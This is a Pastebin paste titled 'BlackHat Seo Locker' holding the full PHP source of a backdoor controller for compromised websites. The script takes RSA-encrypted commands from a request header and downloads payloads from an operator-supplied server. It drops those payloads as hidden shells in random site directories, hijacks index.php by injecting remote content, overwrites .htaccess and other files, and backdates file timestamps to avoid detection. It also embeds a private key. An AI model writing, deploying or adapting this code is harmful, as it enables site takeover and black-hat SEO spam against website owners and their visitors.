API tools faq
paste
willysec_id

BlackHat Seo Locker

willysec_id
Jul 15th, 2024
108
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.39 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <?php
  2. //style.php
  3. error_reporting(0);
  4. class ErrorCode
  5. {
  6.     const E_200400 = 200400;
  7. }
  8. class MsgText
  9. {
  10.     const PARAM_EMPTY = 'param is empty';
  11.     const PARAM_TYPE = 'param type error';
  12.     const VALUE_ERROR = 'value error';
  13.     const NOCHANGE = 'no change';
  14.     const LOCK_FILE_SUCCESS = 'generate lock file success,but lock index.php error';
  15.     const LOCK_FILE_ERROR = 'generate lock file error';
  16.     const REMOTE_GET_ERROR = 'get remote content error';
  17.     const LOCAL_FILE_ERROR = 'generate local file error';
  18.     const SUCCESS = 'success';
  19.     const LOCAL_FILE_EXISTS = 'local file doesn\'t exist';
  20.     const REMOTE_FILE_EXISTS = 'remote file doesn\'t exist';
  21.     const RENAME_ERROR = 'rename error';
  22.     const INDEX_ERROR = 'index hijack error';
  23.     const UNKNOWN_ERROR = 'unknown error';
  24.     const DECRYPT_FAIL = 'params decrypt fail';
  25. }
  26. function error($msg = MsgText::UNKNOWN_ERROR, $extras = [], $code = 0)
  27. {
  28.     empty($code) && $code = ErrorCode::E_200400;
  29.     exit(@json_encode(['code' => $code, 'msg' => $msg, 'extras' => $extras], JSON_UNESCAPED_UNICODE));
  30. }
  31. function success($data)
  32. {
  33.     exit(@json_encode(['code' => 200, 'msg' => MsgText::SUCCESS, 'data' => $data], JSON_UNESCAPED_UNICODE));
  34. }
  35. function getDirPathsByLevel($level = 6)
  36. {
  37.     $initDir = $_SERVER['DOCUMENT_ROOT'];
  38.     $dirs = array($initDir);
  39.     $count = count($dirs);
  40.     while (count($dirs) > ($count - 1)) {
  41.         $path = $dirs[($count - 1)];
  42.         $count += 1;
  43.         if (@is_dir($path) && @$handle = @opendir($path)) {
  44.             while ($file = @readdir($handle)) {
  45.                 $realpath = $path . '/' . $file;
  46.                 if ($file == '.' || $file == '..' || !is_dir($realpath) || substr($file, 0, 1) === '.') {
  47.                     continue;
  48.                 }
  49.                 $path3 = str_replace($initDir, "", $path);
  50.                 $path4 = explode("/", $path3);
  51.                 if (count($path4) > $level - 1) {
  52.                     continue;
  53.                 }
  54.                 $dirs[] = $realpath;
  55.             }
  56.         }
  57.         @closedir($handle);
  58.     }
  59.     return $dirs;
  60. }
  61. function getUrl($url)
  62. {
  63.     $curl = curl_init();
  64.     curl_setopt($curl, CURLOPT_URL, $url);
  65.     curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  66.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  67.     curl_setopt($curl, CURLOPT_TIMEOUT, 5);
  68.     curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
  69.     curl_exec($curl);
  70.     $httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  71.     curl_close($curl);
  72.     if ($httpCode === 200) {
  73.         $content = curl_exec($curl);
  74.         return ['code' => 200, 'resp' => $content];
  75.     }
  76.     return ['code' => 500, 'resp' => ''];
  77. }
  78. function getRemoteContent($url)
  79. {
  80.     $content = @file_get_contents($url);
  81.     if ($content === false) {
  82.         $curl = curl_init();
  83.         curl_setopt($curl, CURLOPT_URL, $url);
  84.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  85.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  86.         curl_setopt($curl, CURLOPT_TIMEOUT, 5);
  87.         curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
  88.         $content = curl_exec($curl);
  89.         curl_close($curl);
  90.     }
  91.     return !empty($content) && is_string($content) ? $content : '';
  92. }
  93. function copyfile($content, $localfile, $isAppend = false, $appendContent = '')
  94. {
  95.     if ($isAppend && !empty($appendContent)) {
  96.         $content = trim($content);
  97.         if (substr($content, -2, 2) !== '?>') {
  98.             $content .= ' ?>';
  99.         }
  100.         $content = $content . PHP_EOL . PHP_EOL . $appendContent;
  101.     }
  102.     @file_put_contents($localfile, $content);
  103.     if (!file_exists($localfile)) {
  104.         $openedfile = @fopen($localfile, "w");
  105.         @fwrite($openedfile, $content);
  106.         @fclose($openedfile);
  107.     }
  108.     if (!file_exists($localfile)) {
  109.         return false;
  110.     }
  111.     return true;
  112. }
  113. function updateFiletime($filepath)
  114. {
  115.     $ctime = filectime($filepath);
  116.     $now = time();
  117.     if (!($now > $ctime + 31104000)) {
  118.         $newTime = $now - (mt_rand(15552000, 31104000));
  119.         touch($filepath, $newTime, $newTime);
  120.         return true;
  121.     }
  122.     return true;
  123. }
  124. $privateKey = '-----BEGIN PRIVATE KEY-----
  125. MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC30w49ItOfldQ6
  126. dB+0gEbeeW6BEClcx+NZzmpX2YcRHFV80BurCWBavPFehV8Sy9yL2u/y3mv3QJJ+
  127. x2kKvly8zKx4GbXPbsWJk6Ho0Rxq49oXkBarQBOqROZeaFF3Mzpd/PdLSsxEvG1M
  128. tQd2wOx5r6XD86jyfN7LAJUUVvbJvn1CHo03nFH12k1KYwLnQfzQI5nX7yQLa0jt
  129. fG5TA34Fm0EMbFdHWjAN/VdEjoJI6it4PCQP5wk4ga2BvVquQkuPbsbr8364d3I6
  130. GuGAKDR0wfkT20n0E6kAmDI3ol2bfa0rQncqUS3OU3INpxOZS8eKCIgC3bM81mdi
  131. MQ6TsAQ9AgMBAAECggEAJLGSlA2RpLdpx8lKUuOQQfSHZGfveb/E2DZl7+dSGM5J
  132. GkMIYtnaTAKPQ8jns37SJXCsmRRhBNf05i20ABsDtAQ/ITIwopmAAPhhR3IGdCfL
  133. bwyqGcEOq9xZB9tW965YJk7KplLl94qNXtR8Cu5zxc6UDktjHBRk/Ky/FXJOjPKM
  134. sA8rhox7dqlZUB3I/qiqrQOgT1Bsq1BFT+2GGwRUWZ1CyFoZvhsDomdo4yhRrB0b
  135. 8Ym4MDiVqxFPVW8XB9RFD9YKt+v50Eb6iSKJNLpRmjZDNZbrEYO6NRsRBM7brDa9
  136. n39mZWFr47wGGXXv/NhwTvRI+2Si/ZfdP4+o5TeSWQKBgQDhIVOUODisiLhk7XKb
  137. Yu7BW1ZFcK0JxurqHN22msvA0Q/1q4RvziETjekXIn9lVKCmS/gy2O2RtuQRulAR
  138. fc3sz2W9tNXRF8Avy0728NG0baOOwBalO8w3cCX6Nnm70pJer+iJSn3tmAKSB4LT
  139. vbSB8pt6QgP8NPHyQdWp2LwOtwKBgQDRB8lgSaImIMJBaXERSaoNg8kxv3/cv4g5
  140. jUlljxNQcUsj0V7XilnB3mFxq5rHjBZTsKzMMQyvhOxYhptDfw6OLtoPUk2WiBUs
  141. l3qU0tIXNN+cTxu2SMKTjwMktkpmACJqa+k27eEUqxrKO/6SEiP9FMXHvgA4EEBM
  142. Hww1eU9QqwKBgAWSY5Uphw2OHLIyxkFeQ3Z5ojr5vO6fA7VjnYEld6GACxsTcaWq
  143. vlrTik9ORUTmwUscWjo38DlJA4AE0nJ8YJpZz7TQQvJ32gPUzlGCSE5k4EVqL6VL
  144. Q5Sjq+zzaDPj1EePpvuu4kr9FiMzGGPRMCR/MqXl+F9HmC1cv8MCYDUlAoGBAK77
  145. g7pVKaYdWkCD0iEUt4Rkw/IfSxwyQglbmwungBWhIbO0O17X9Fd0n8IWU5WkUbRx
  146. e9XbYbE05t0cobEZFcg0tFqLHWRcOs1/aSBYc4L1whMJrjskIa6A07LR3uoQRr8r
  147. 4qkW7YrtyZluK6eABByCXSbeiTRldk3C1+eTy6/NAoGAb9/J+NWrhYSr/VoGWjui
  148. chXCNszy4w6exVwxXQKNTtlzKxyhQfVPK2BxrptWL6KCRKpz3wh+WY2C3QYyVfwG
  149. FB4hwDr2mY4TWF9pD194iES1yhrQGlI8XM+2LVhBl3p0x+TFgJMaTgDDqAnxpuqT
  150. upBYqTYMlOd+VR7hENMaFqo=
  151. -----END PRIVATE KEY-----';
  152. $p = $_SERVER['HTTP_P'];
  153. $params = openssl_private_decrypt(base64_decode(urldecode($p)), $decrypted, $privateKey) ? $decrypted : null;
  154. if (is_null($params)) {
  155.     error(MsgText::DECRYPT_FAIL);
  156. }
  157. $params = json_decode($params, true);
  158. if (!is_array($params)) {
  159.     error(MsgText::PARAM_TYPE, $params);
  160. }
  161. if (empty($params['server'])) {
  162.     error('server ' . MsgText::PARAM_EMPTY);
  163. }
  164. if (empty($params['iden'])) {
  165.     error('iden ' . MsgText::PARAM_EMPTY);
  166. }
  167. $iden = isset($params['iden']) ? strtolower($params['iden']) : '';
  168. switch ($iden) {
  169.     case "beima":
  170.         $res = doBeima($params);
  171.         break;
  172.     case "rename":
  173.         $res = doRename($params);
  174.         break;
  175.     case "index":
  176.         $res = doIndex($params);
  177.         break;
  178.     case "sub":
  179.     case "htaccess":
  180.         $res = doSub($params);
  181.         break;
  182.     case "lock":
  183.         $res = doLock($params);
  184.         break;
  185.     case "style":
  186.         $res = doStyle($params);
  187.         break;
  188.     default:
  189.         error('iden ' . MsgText::VALUE_ERROR);
  190. }
  191. function doBeima($params)
  192. {
  193.     if (empty($params['filename'])) {
  194.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  195.     }
  196.     if (empty($params['shellfile'])) {
  197.         error('shellfile ' . MsgText::PARAM_EMPTY, $params);
  198.     }
  199.     empty($params['level']) && $params['level'] = 6;
  200.     $dirs = getDirPathsByLevel($params['level']);
  201.     $temp = array_rand($dirs);
  202.     $createDir = $dirs[$temp] . '/';
  203.     $localfilepath = $createDir . $params['filename'];
  204.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  205.     $content = getRemoteContent($remoteFileUrl);
  206.     $content = json_decode($content, true);
  207.     if (!empty($content['result'])) {
  208.         if (copyfile($content['result'], $localfilepath)) {
  209.             updateFiletime($localfilepath);
  210.             $beimaurl = str_replace($_SERVER['DOCUMENT_ROOT'], '', $localfilepath);
  211.             success(compact('localfilepath', 'beimaurl'));
  212.         }
  213.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  214.     }
  215.     error(MsgText::REMOTE_FILE_EXISTS, compact('remoteFileUrl'));
  216. }
  217. function doRename($params)
  218. {
  219.     if (empty($params['sourcename'])) {
  220.         error('sourcename ' . MsgText::PARAM_EMPTY, $params);
  221.     }
  222.     if (empty($params['rename'])) {
  223.         error('rename ' . MsgText::PARAM_EMPTY, $params);
  224.     }
  225.     if ($params['sourcename'] === $params['rename']) {
  226.         error(MsgText::NOCHANGE);
  227.     }
  228.     $sourceFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['sourcename'];
  229.     $renameFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['rename'];
  230.     $resSource = $params['server'] . str_replace(strtolower($_SERVER['DOCUMENT_ROOT']), '', strtolower($sourceFile));
  231.     $resSource = str_replace('\\', '/', $resSource);
  232.     if (file_exists($sourceFile)) {
  233.         if (rename($sourceFile, $renameFile)) {
  234.             success($renameFile);
  235.         } else {
  236.             error(MsgText::RENAME_ERROR, compact('renameFile'));
  237.         }
  238.     } else {
  239.         error(MsgText::LOCAL_FILE_EXISTS, compact('resSource'));
  240.     }
  241. }
  242. function doIndex($params)
  243. {
  244.     if (empty($params['shellfile'])) {
  245.         error('shellfile ' . MsgText::PARAM_EMPTY, $params);
  246.     }
  247.     $remoteUrl = $params['server'] . trim($params['shellfile']);
  248.     $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
  249.     $content = getRemoteContent($remoteUrl);
  250.     $content = json_decode($content, true);
  251.     if (!empty($content['result'])) {
  252.         $oldContent = '';
  253.         if (file_exists($localfilepath)) {
  254.             $oldContent = @file_get_contents($localfilepath);
  255.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.html')) {
  256.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.html');
  257.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.htm')) {
  258.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.htm');
  259.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.html')) {
  260.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.html');
  261.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.htm')) {
  262.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.htm');
  263.         }
  264.         if (copyfile($content['result'], $localfilepath, true, $oldContent)) {
  265.             updateFiletime($localfilepath);
  266.             @chmod($localfilepath, 0644);
  267.             success($localfilepath);
  268.         }
  269.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  270.     }
  271.     error(MsgText::INDEX_ERROR, compact('remoteUrl'));
  272. }
  273. function doSub($params)
  274. {
  275.     if (empty($params['shellfile'])) {
  276.         error('shellfile' . MsgText::PARAM_EMPTY, $params);
  277.     }
  278.     if (empty($params['filename'])) {
  279.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  280.     }
  281.     $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
  282.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  283.     $content = getRemoteContent($remoteFileUrl);
  284.     $content = json_decode($content, true);
  285.     if (!empty($content['result'])) {
  286.         if (copyfile($content['result'], $localfilepath)) {
  287.             updateFiletime($localfilepath);
  288.             @chmod($localfilepath, 0644);
  289.             success($localfilepath);
  290.         }
  291.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  292.     }
  293.     error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
  294. }
  295. function doLock($params)
  296. {
  297.     if (empty($params['filename'])) {
  298.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  299.     }
  300.     if (empty($params['domain'])) {
  301.         error('domain ' . MsgText::PARAM_EMPTY, $params);
  302.     }
  303.     if (empty($params['shellfile'])) {
  304.         error('shellfile ' . MsgText::PARAM_EMPTY, $params);
  305.     }
  306.     $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
  307.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  308.     $content = getRemoteContent($remoteFileUrl);
  309.     $content = json_decode($content, true);
  310.     if (!empty($content['result'])) {
  311.         if (copyfile($content['result'], $localfilepath)) {
  312.             $lockurl = $params['domain'] . $params['filename'];
  313.             $lockres = getUrl($lockurl);
  314.             @unlink($localfilepath);
  315.             if ($lockres['code'] === 200 && !empty($lockres['resp']) && strpos($lockres['resp'], 'success')) {
  316.                 success($lockres['resp']);
  317.             }
  318.             error(MsgText::LOCK_FILE_SUCCESS, compact('lockurl', 'lockres'));
  319.         }
  320.         @unlink($localfilepath);
  321.         error(MsgText::LOCK_FILE_ERROR, compact('localfilepath'));
  322.     }
  323.     error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
  324. }
  325. function doStyle($params)
  326. {
  327.     if (empty($params['shellfile'])) {
  328.         error('shellfile' . MsgText::PARAM_EMPTY, $params);
  329.     }
  330.     if (empty($params['filename'])) {
  331.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  332.     }
  333.     if (empty($params['domain'])) {
  334.         error('domain ' . MsgText::PARAM_EMPTY, $params);
  335.     }
  336.     $localfilepath = $params['domain'] . $params['filename'];
  337.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  338.     $content = getRemoteContent($remoteFileUrl);
  339.     $content = json_decode($content, true);
  340.     if (!empty($content['result'])) {
  341.         if (copyfile($content['result'], $localfilepath)) {
  342.             updateFiletime($localfilepath);
  343.             @chmod($localfilepath, 0644);
  344.             success($localfilepath);
  345.         }
  346.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  347.     }
  348.     error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
  349. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!